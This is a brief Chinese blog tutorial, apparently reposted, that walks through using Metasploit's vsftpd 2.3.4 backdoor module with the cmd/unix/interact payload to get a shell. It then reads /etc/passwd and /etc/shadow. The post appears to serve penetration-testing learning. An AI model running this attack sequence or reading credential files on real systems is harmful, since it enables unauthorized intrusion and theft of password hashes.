漏洞利用之Metasploit使用过程

标签：参数   vsftpd   ons   执行   rac   etc   shadow   strong   conf   

漏洞利用之Metasploit使用过程

先扫描端口，看开放的服务，如开放ftp，版本是vsftpd 2.3.4；
使用search搜索vsftp查看是否在相应的漏洞利用exploit，输入search vsftp；
use exploit/unix/ftp/vsftpd_234_backdoor，选择exploit（tab键补齐）；
设置参数show options;
set payload cmd/unix/interact选择payload（tab键补齐）；
设置参数show options;
执行攻击测试，输入exploit即可，如果成功，将返回一个shell（绿色标志一般攻击有效）；
即可执行命令，id，whoami，ifconfig，cat /etc/passwd,cat /etc/shadow等等。

漏洞利用之Metasploit使用过程

标签：参数   vsftpd   ons   执行   rac   etc   shadow   strong   conf   

原文地址：http://www.cnblogs.com/christychang/p/6061061.html